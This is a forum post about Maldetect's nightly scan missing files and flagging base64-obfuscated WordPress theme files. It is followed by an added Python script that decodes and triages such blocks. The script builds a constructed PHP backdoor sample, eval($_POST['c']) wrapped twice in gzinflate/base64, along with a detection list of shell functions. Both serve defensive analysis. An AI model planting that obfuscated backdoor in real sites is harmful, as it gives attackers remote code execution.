Maldetect is not scanning all users' files on the nightly scan!!
A virus program in WordPress detected a virus and I got a mail about it. Now I wondered why Maldetect did not notice it and investigated.
Now this is what happens on a nightly scan; watch the number of files:
Jan 21 03:34:40 server18 maldet(11048): {scan} found ClamAV clamscan binary, using as scanner engine...
Jan 21 03:34:40 server18 maldet(11048): {scan} scan of /home*/*/domains/*/public_html (7451 files) in progress...
Jan 21 03:34:49 server18 maldet(11048): {scan} scan completed on /home*/*/domains/*/public_html: files 7451, malware hits 0, cleaned hits 0
Seems OK, no malware hits found.
But I did not trust it and did a manual Maldetect scan just to be sure. Look what happens, and look again at the number of files:
maldet(9726): {scan} signatures loaded: 13714 (11813 MD5 / 1901 HEX)
maldet(9726): {scan} building file list for /home/user/domains/userdomain.nl/public_html/, this might take awhile...
maldet(9726): {scan} file list completed, found 6737 files...
maldet(9726): {scan} found ClamAV clamscan binary, using as scanner engine...
maldet(9726): {scan} scan of /home/user/domains/userdomain.nl/public_html/ (6737 files) in progress...
maldet(9726): {scan} processing scan results for hits: 2 hits 0 cleaned
maldet(9726): {scan} scan completed on /home/user/domains/userdomain.nl/public_html/: files 6737, malware hits 2, cleaned hits 0
maldet(9726): {scan} scan report saved, to view run: maldet --report 012115-1537.9726
This is the result in the email I got from the manual scan:
{HEX}gzbase64.inject.unclassed.15 : /home/user/domains/userdomain.nl/public_html/footer.php
The same goes for functions.php.
As you can see there are 2 issues now, but in fact there are 3 issues.
1.) There IS malware found, which is indeed present in 2 files on that domain, but which was not found by the automatic scan.
2.) A manual scan finds 6737 files in my domain alone, but the server scan says there are only 7451 files present? This can't be true, because I'm sure that a couple of domains have a minimum of over 3000 files each. So the real number of files should be a lot higher.
And this test has nothing to do with depth, because I placed those two "infected" files in my public_html folder, so the automatic (cronjob) scan should have found them in any case.
3.) There are 2 files, named functions.php and footer.php, which come from a free WordPress theme. After some investigation it seems that ALL free themes coming from
http://www.freewordpressthemes4u.com/ are encrypted in base64 and Maldetect sees them as malware-infected. In fact these are false positives.
I wrote an email about this to the creators of Maldetect, but until now (7 days later) there is no answer yet, and I don't expect to get any answer either.
So I have 2 questions now.
A.) The major problem is of course issues 1 and 2. How can this be fixed so that the automatic scan detects the same as what the manual scan is detecting?
B.) As far as I could see there is no possibility to exclude specific files from scanning. There will be more users making use of these free WordPress themes, because they are nice, and lots of them will not go and try to decrypt them, so all Maldetect users will encounter this issue eventually.
Is there a way to avoid these false positives in the future, so users can use these free themes, which are in fact not infected?
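The hit reported above, {HEX}gzbase64.inject.unclassed.15, fires on the eval(gzinflate(base64_decode('...'))) wrapper, and that wrapper is used both by theme obfuscators and by PHP backdoors, so the practical check before calling a hit a false positive is to decode the blob and read what it actually executes. The Python script below is an added example, not part of the original post and not code from Linux Malware Detect: it extracts the encoded block from a PHP file, reverses the base64 and raw DEFLATE layers (peeling nested wrappers, since a second eval(gzinflate()) inside the first is a common backdoor pattern), and flags constructs such as eval() on request input or shell execution. The two sample footer files it builds are constructed for the demonstration and are not the theme files mentioned in the post; the marker list is a heuristic, not a signature set.

```python
"""Decode eval(gzinflate(base64_decode(...))) blocks in PHP files.

Added example, not part of the original forum post and not code from
Linux Malware Detect (maldet). It shows the check to run when maldet
reports a {HEX}gzbase64.inject.* hit on a theme file: extract the
encoded blob, decode it, and read what it would execute.
"""
import base64
import re
import zlib

# Matches the classic eval(gzinflate(base64_decode('...'))) wrapper.
# Whitespace and quote style vary between generators, so be tolerant.
GZBASE64_RE = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]"
    r"([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*\)",
    re.IGNORECASE,
)

# Constructs that, if present in the decoded layer, mean "read this carefully"
# rather than "harmless theme footer". Heuristic list chosen for this example.
SUSPICIOUS_MARKERS = (
    "eval(", "base64_decode(", "gzinflate(", "str_rot13(",
    "$_POST", "$_GET", "$_REQUEST", "$_COOKIE",
    "system(", "shell_exec(", "passthru(", "exec(", "popen(",
    "curl_init(", "file_get_contents('http", 'file_get_contents("http',
    "create_function(", "assert(",
)


def find_payloads(php_source: str) -> list:
    """Return the base64 blobs found inside eval(gzinflate(base64_decode())) calls."""
    return [re.sub(r"\s+", "", m) for m in GZBASE64_RE.findall(php_source)]


def decode_payload(b64_blob: str) -> str:
    """Reverse base64 + raw DEFLATE, which is what PHP's gzinflate() consumes."""
    raw = base64.b64decode(b64_blob)
    # wbits=-15 selects raw DEFLATE (no zlib/gzip header), matching gzdeflate().
    return zlib.decompress(raw, -15).decode("utf-8", errors="replace")


def unwrap_layers(php_source: str, max_layers: int = 10) -> list:
    """Peel nested wrappers: a decoded layer may itself be another eval(gzinflate(...)).

    Returns the decoded layers in order, innermost last.
    """
    layers = []
    current = php_source
    for _ in range(max_layers):
        blobs = find_payloads(current)
        if not blobs:
            break
        current = "\n".join(decode_payload(b) for b in blobs)
        layers.append(current)
    return layers


def suspicious_markers(decoded: str) -> list:
    """Which of the heuristic markers appear in the decoded code."""
    return [m for m in SUSPICIOUS_MARKERS if m in decoded]


def triage(php_source: str) -> dict:
    """Summarise what the obfuscated block does, so the false-positive call is informed."""
    layers = unwrap_layers(php_source)
    innermost = layers[-1] if layers else ""
    markers = suspicious_markers(innermost)
    if not layers:
        verdict = "no encoded block"
    elif markers:
        verdict = "review: executes input/system/network or nested decoder"
    else:
        verdict = "plain output after decoding: likely theme obfuscation"
    return {
        "encoded_blocks": len(find_payloads(php_source)),
        "layers": len(layers),
        "innermost": innermost,
        "markers": markers,
        "verdict": verdict,
    }


def encode_gzbase64(php_fragment: str) -> str:
    """Build the wrapper the way theme obfuscators do (used only to construct test input)."""
    comp = zlib.compressobj(level=9, wbits=-15)      # raw DEFLATE, like PHP gzdeflate()
    deflated = comp.compress(php_fragment.encode()) + comp.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(deflated).decode()


# Constructed sample files (not the real theme files): one benign credit line,
# one that hides an eval() of POST data under two wrapper layers.
BENIGN_FOOTER = "<?php\n" + encode_gzbase64(
    "echo '<p class=\"credit\">Theme by <a href=\"http://example.invalid/\">example</a></p>';"
) + "\n?>"

BACKDOOR_FOOTER = "<?php\n" + encode_gzbase64(
    encode_gzbase64("if (isset($_POST['c'])) { eval($_POST['c']); }")
) + "\n?>"

if __name__ == "__main__":
    for name, src in (("benign", BENIGN_FOOTER), ("backdoor", BACKDOOR_FOOTER)):
        r = triage(src)
        print("%s: %s (layers=%d, markers=%s)" % (name, r["verdict"], r["layers"], r["markers"]))
        print("   decoded:", r["innermost"][:100])
```

Run it against a real footer.php or functions.php by reading the file into triage(); a decoded layer that only echoes HTML is the theme-credit obfuscation the post describes, while a nested decoder or anything touching $_POST, $_GET or a shell function should be treated as a hit, whatever the theme's origin. For suppressing a confirmed false positive, the maldet install directory (by default /usr/local/maldetect) ships ignore_paths and ignore_sigs files for excluding paths or a named signature from scans; check the README of the installed version for their exact semantics.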